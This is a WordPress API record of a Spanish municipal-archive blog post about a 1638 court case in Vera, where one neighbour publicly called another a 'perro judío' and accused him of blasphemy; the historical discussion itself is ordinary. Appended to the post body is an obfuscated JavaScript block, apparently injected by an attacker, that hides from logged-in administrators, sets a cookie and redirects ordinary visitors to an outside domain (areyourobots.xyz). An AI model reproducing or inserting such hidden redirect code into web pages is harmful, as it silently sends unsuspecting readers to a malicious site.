{"id":2800,"date":"2017-10-13T12:37:33","date_gmt":"2017-10-13T12:37:33","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=2800"},"modified":"2018-01-15T10:27:31","modified_gmt":"2018-01-15T10:27:31","slug":"injurias-o-blasfemias-diego-fernandez-contra-pedro-andrea-1638","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2017\/10\/13\/injurias-o-blasfemias-diego-fernandez-contra-pedro-andrea-1638\/","title":{"rendered":"\u00bfINJURIAS O BLASFEMIAS? DIEGO FERN\u00c1NDEZ CONTRA PEDRO ANDREA. 1638"},"content":{"rendered":"<p>Se describe brevemente el contenido del expediente judicial del a\u00f1o 1638 (Archivo Municipal de Vera) de Diego Fern\u00e1ndez contra Pedro Andrea, vecinos de Vera. Se muestra con claridad el antijuda\u00edsmo que se viv\u00eda en aquellos a\u00f1os en peque\u00f1os sectores poblacionales europeos, siglo y medio despu\u00e9s de su expulsi\u00f3n parcial de Espa\u00f1a en 1492 (primero en los territorios germanos, luego en Francia en el a\u00f1o 1182, en Inglaterra en 1290\u2026).<!--more--><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/014detalle-de-la-estrella-de-David.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-2801\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/014detalle-de-la-estrella-de-David.jpg\" alt=\"\" width=\"320\" height=\"241\" \/><\/a><\/p>\n<p>El investigador o el archivero a veces se encuentran con documentos m\u00e1s proclives a generar preguntas que respuestas. De ah\u00ed el misterio y la curiosidad que despiertan en el lector. En el Archivo Municipal de Vera se sigue catalogando el interesante fondo judicial que alberga, entre cuyos documentos, de vez en cuando se describe el asunto de alg\u00fan documento fuera de lo com\u00fan y que nos hace preguntarnos sobre la manera de pensar y de actuar de nuestros antepasados. Es el caso del que se describe a continuaci\u00f3n:<\/p>\n<p><i>1638, julio, 19. Vera<\/i><\/p>\n<p><i>Criminal de oficio mediante denuncia de Diego Fern\u00e1ndez, de edad de unos 60 a\u00f1os, vecino de Vera y fiscal de ella y de su jurisdicci\u00f3n, contra Pedro Andrea, el Viejo, vecino de Vera, por insultarle p\u00fablicamente con injurias.<\/i><\/p>\n<p>El d\u00eda 15 de julio de 1638 el vecino de Vera Pedro Andrea (\u201cde m\u00e1s de setenta a\u00f1os de edad\u201d), sali\u00f3 de su casa, situada cerca de \u201cla esquina que dicen de Juan de Sahabedra\u201d y prorrumpi\u00f3 en grandes voces para que todo el mundo lo oyera, acusando a su vecino, Diego Fern\u00e1ndez, de que era un &#8216;<b>perro jud\u00edo<\/b>&#8216;, que \u201c<b>le hab\u00eda muerto las hambres muchas veces y que todas las veces que se sentaba a comer en su casa pon\u00eda debajo de donde se sentaba un crucifijo o un Cristo Crucificado y se sentaba sobre \u00e9l<\/b>\u201d. Algunos testigos afirmar\u00e1n m\u00e1s tarde que a\u00f1adi\u00f3 la expresi\u00f3n \u201c<b>perro infame<\/b>\u201d.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/un-cristo-crucificado.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2813\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/un-cristo-crucificado.jpg\" alt=\"\" width=\"2841\" height=\"315\" \/><\/a><\/p>\n<p>Vera a\u00fan era un lugar peligroso, aun habiendo pasado 69 a\u00f1os del cerco de Ab\u00e9n Humeya y sus moriscos y Vera hac\u00eda unos 30 a\u00f1os que albergada a la congregaci\u00f3n de Padres M\u00ednimos, religiosos que sostendr\u00e1n la econom\u00eda y la educaci\u00f3n de Vera hasta la invasi\u00f3n napole\u00f3nica.<\/p>\n<p>Y volviendo al texto, fuese cierta o no la supuesta injuria no deja de sorprendernos la acusaci\u00f3n que lanza a voz en grito el tal Pedro Andrea. No ya por insinuar la genealog\u00eda de su vecino Diego (que tambi\u00e9n es interesante), sino por la multitud de dudas y planteamientos que despierta la acusaci\u00f3n.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/detalle-yudio-1892-2.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2804\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/detalle-yudio-1892-2.jpg\" alt=\"\" width=\"880\" height=\"544\" \/><\/a><\/p>\n<p>Huelga decir que Diego Fern\u00e1ndez denuncia a su vecino inmediatamente y presenta su queja al Alcalde Mayor de Vera. Despu\u00e9s de sondear la opini\u00f3n de algunos testigos se encarcela a Pedro, se embargan sus bienes y se llama a declarar a los testigos de Diego. Todos ellos coinciden: Pedro siempre ha tenido \u201cmala lengua\u201d y es famosa su actitud belicosa entre el vecindario. A\u00f1aden que es mordaz y &#8216;desfamador&#8217; (sic). Contin\u00faan, respondiendo a las preguntas del procurador, en las que ya se adivina la actitud de sospecha que la acusaci\u00f3n de ser jud\u00edo supon\u00eda en aquellos siglos (y teniendo en cuenta la exacta descripci\u00f3n de lo que supuestamente hac\u00eda mientras com\u00eda), que Diego es honrado, cristiano viejo y de limpia sangre, sin traza de moro ni jud\u00edo, sin malas inclinaciones, descendiente de cristianos viejos sin m\u00e1cula de las dichas razas ni ha sido ajusticiado por el Santo Oficio. Otros testigos dir\u00e1n que Diego Fern\u00e1ndez proviene de Guadix (Granada) y que estando all\u00ed hab\u00edan comprobado la buena fama de Diego. Ten\u00eda un hijo sacerdote.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/los-cristos-debajo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2811\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/los-cristos-debajo.jpg\" alt=\"\" width=\"2931\" height=\"336\" \/><\/a><\/p>\n<p>M\u00e1s adelante vemos complicarse la trama del asunto, pues parece ser que Diego ten\u00eda un mes\u00f3n, situado extramuros a la ciudad de Vera, que lo dejaba arrendado a Mar\u00eda Mu\u00f1oz, mujer de Pedro Andrea, que le deb\u00eda dinero y que, meses antes, cerca del mes\u00f3n se hab\u00eda cometido un asesinato, el de <b>Isabel de la Parra<a class=\"sdendnoteanc\" href=\"#sdendnote1sym\" name=\"sdendnote1anc\"><sup>1<\/sup><\/a><\/b>, mujer de <b>Sebasti\u00e1n de Burgos<\/b>, habitantes de la cueva de la Fuente Chica.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/sepelio-isabel-de-la-parra-fol-264-1639-lib-3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2806\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/sepelio-isabel-de-la-parra-fol-264-1639-lib-3.jpg\" alt=\"\" width=\"1772\" height=\"710\" \/><\/a><\/p>\n<p>Los testigos de Pedro, a su vez, defienden a su conocido y lo exoneran de cualquier culpa. Pero Pedro es condenado a pagar 1000 maraved\u00eds.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/malicia.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2812\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/06\/malicia.jpg\" alt=\"\" width=\"1416\" height=\"462\" \/><\/a><\/p>\n<p><b>La cuesti\u00f3n tratada nos plantea m\u00e1s dudas que respuestas:<\/b><\/p>\n<p><b>1.-<\/b><b>\u00bf<\/b><b>Por qu\u00e9 Pedro describe tan pormenorizadamente<\/b> y para que todos lo oyeran ese <b>acto<\/b> de sentarse sobre un crucifijo? Si lo describe de esa manera y a voz en grito deducimos que es un mensaje lanzado a unos receptores que entienden perfectamente el mensaje y, por ende, dicha costumbre. \u00bfEra esa una costumbre practicada entre los jud\u00edos espa\u00f1oles ocultos de aquellos siglos o una costumbre inventada por aquel paranoico y calenturiento imaginario colectivo cristiano contra el eterno y m\u00edtico estereotipo jud\u00edo?<\/p>\n<p><b>2.<\/b><b>&#8211;<\/b><b>\u00bfLe dirige el insulto de &#8216;perro jud\u00edo&#8217; para informar de que Diego era, simplemente, un blasfemo<\/b> (sea de la fe que fuese) o para acusarlo de su supuesta raza?\u00bfPara lanzar injurias y hacer da\u00f1o echando mano del antijuda\u00edsmo milenario, aun a sabiendas de que era cristiano? El interrogatorio al que luego lo someten nos dirige hacia la segunda apreciaci\u00f3n, ya que tiene que &#8216;demostrar&#8217; la &#8216;limpieza&#8217; de su sangre y sus or\u00edgenes geogr\u00e1ficos. Y por mucha mala fama de deslenguado que tuviera Pedro procedieron a investigar a Diego.<\/p>\n<p><b>3.-Diego Fern\u00e1ndez ten\u00eda cierto poder<\/b> en Vera. Era fiscal. \u00bfNo arriesg\u00f3 demasiado Pedro al acusarlo de realizar estas supuestas pr\u00e1cticas blasfemas?<\/p>\n<p><b>4.-En ning\u00fan momento se exige a Diego que entregue certificados de nacimiento<\/b> de sus antepasados. S\u00ed los hemos visto en otros expedientes del fondo judicial. \u00bfPor qu\u00e9?\u00bfOcultaba Diego algo sobre su pasado?<\/p>\n<p><b>5.-Dando por cierto la falsedad<a class=\"sdendnoteanc\" href=\"#sdendnote2sym\" name=\"sdendnote2anc\"><sup>2<\/sup><\/a> de los argumentos que sostuvieron la leyenda negra espa\u00f1ola<\/b>, m\u00e1s basada en la &#8216;imperiofobia&#8217; que en otra raz\u00f3n, vemos que, a pesar de haber sido se\u00f1alado Diego Fern\u00e1ndez como jud\u00edo -y hay datos claros de que s\u00f3lo una peque\u00f1a parte de los jud\u00edos espa\u00f1oles salieron de Espa\u00f1a para no volver: los que no quisieron bautizarse ni vender sus bienes, oportunidad que no se di\u00f3 en el resto de Europa-, sus vecinos veratenses y accitanos, sin dudas, defienden a Diego y a su familia sin preguntarse por m\u00e1s, censurando la &#8216;mala lengua&#8217; de su vecino Pedro. \u00bfEs \u00e9sta una prueba de la protecci\u00f3n que dio la poblaci\u00f3n espa\u00f1ola a los conversos?<\/p>\n<p><b>Pedro Andrea sab\u00eda perfectamente que no habr\u00eda podido haber hecho da\u00f1o a su enemigo s\u00f3lo diciendo que sus antepasados eran jud\u00edos; los jud\u00edos bautizados hab\u00edan sido aceptados. Ten\u00eda que acusarlo de blasfemia y lanzar la sospecha de su supuesta judeidad, para dar verosimilitud a su acusaci\u00f3n.<\/b><\/p>\n<div id=\"sdendnote1\">\n<p class=\"sdendnote\"><a class=\"sdendnotesym\" href=\"#sdendnote1anc\" name=\"sdendnote1sym\">1<\/a>Efectivamente, en el libro parroquial de sepelios n.\u00ba 3, fol 264 indica que \u201cIsabel muri\u00f3 en esta Ciudad de Vera porque la mataron sin que se sepa qui\u00e9n\u201d, el d\u00eda 16-06-1638. &#8216;Parra&#8217; en Vera es un apellido t\u00edpicamente gitano. Curiosamente, &#8216;Fern\u00e1ndez&#8217; tambi\u00e9n suele serlo, aunque no de forma tan clara como en el caso de &#8216;Parra&#8217;.<\/p>\n<\/div>\n<div id=\"sdendnote2\">\n<p><span style=\"font-size: small\"><a class=\"sdendnotesym\" href=\"#sdendnote2anc\" name=\"sdendnote2sym\">2<\/a> Que es falsedad es una opini\u00f3n personal, bien fundada bibliogr\u00e1ficamente, acudiendo a textos de Gustavo Bueno o de Mar\u00eda Elvira Roca Barea.<\/span><\/p>\n<p><span style=\"font-size: small\">Nota: el detalle de la imagen que muestra la casa del &#8216;yud\u00edo&#8217; (inmediaciones del actual cuartel de la Guardia Civil) est\u00e1 tomado del plano de Vera de 1892 realizado por Jos\u00e9 Moreno Jorge (copia realiza por Luis Cano Rodr\u00edguez, arquitecto).<\/span><\/p>\n<p align=\"right\">16-06-2017<\/p>\n<p align=\"right\">Manuel Caparr\u00f3s Perales<\/p>\n<p align=\"right\">Archivo Municipal del Excmo. Ayuntamiento de Vera<\/p>\n<\/div>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se describe brevemente el contenido del expediente judicial del a\u00f1o 1638 (Archivo Municipal de Vera) de Diego Fern\u00e1ndez contra Pedro Andrea, vecinos de Vera. Se muestra con claridad el antijuda\u00edsmo que se viv\u00eda en aquellos a\u00f1os en peque\u00f1os sectores poblacionales europeos, siglo y medio despu\u00e9s de su expulsi\u00f3n parcial de Espa\u00f1a en 1492 (primero en &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2017\/10\/13\/injurias-o-blasfemias-diego-fernandez-contra-pedro-andrea-1638\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">\u00bfINJURIAS O BLASFEMIAS? DIEGO FERN\u00c1NDEZ CONTRA PEDRO ANDREA. 1638<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":2809,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[213,103,214,212,77,271],"class_list":["post-2800","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-historia","tag-blasfemia","tag-expedientes-judiciales","tag-injuria","tag-judaismo","tag-manuel-caparros-perales","tag-s-xvii"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2800","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=2800"}],"version-history":[{"count":3,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2800\/revisions"}],"predecessor-version":[{"id":3414,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2800\/revisions\/3414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/2809"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=2800"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=2800"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=2800"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}